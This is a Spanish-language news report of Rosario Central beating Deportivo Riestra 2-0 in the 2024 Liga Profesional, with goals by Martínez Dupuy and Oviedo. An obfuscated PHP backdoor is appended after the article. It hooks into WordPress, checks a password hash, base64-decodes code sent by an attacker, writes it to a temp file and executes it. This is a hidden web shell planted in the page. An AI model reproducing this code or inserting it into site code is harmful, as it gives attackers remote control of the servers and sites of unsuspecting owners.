Rosario Central fue muy oportuno y certero y se llevó los tres puntos ante Deportivo Riestra

Rosario Central derrotó a Deportivo Riestra 2-0, en el estadio Guillermo Laza, abriendo la tercera fecha del Torneo 2024 de la Liga Profesional. Luca Martínez Dupuy y Fabricio Oviedo anotaron los goles del equipo de Miguel Russo, que presentó suplentes ya que preservo a los titulares para el decisivo partido de la Libertadores ante Peñarol.

Una buena combinación ofensiva le permitió a Rosario Central ponerse en ventaja a los 8 minutos. Un pase filtrado de Jonathan Gómez a Lautaro Giaccone continuó con la asistencia para que Martínez Dupuy con un toque corto dentro del área anotase.

A partir de ahí, Deportivo Riestra tomó posesión del terreno y generó varias llegadas. Pero entre la seguridad de Axel Werner, la firmeza de la defensa y hasta el travesaño -ante un remate de Jonathan Herrera- le impidieron empatar.

Y sobre el final del partido, con el local insistiendo en su búsqueda, un contragolpe le permitió a Fabricio Oviedo aumentar la diferencia con un derechazo bajo y direccionado a un palo, a los 42 minutos.

Ni siquiera de penal pudo anotar Deportivo Riestra. En el segundo minuto de descuento, Juan Giménez le cometió una falta a Gonzalo Bravo, dentro del área; Milton Céliz ejecutó el penal y su disparo se fue muy alto.

Rosario Central visitará a Peñarol, por la última fecha del Grupo G, buscando el pase a la siguiente fase de la Copa Libertadores. Deportivo Riestra, por su parte, tendrá dos complicados compromisos por el Torneo de la Liga: visitará a Racing Club en la próxima fecha y recibirá a River Plate en la quinta.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}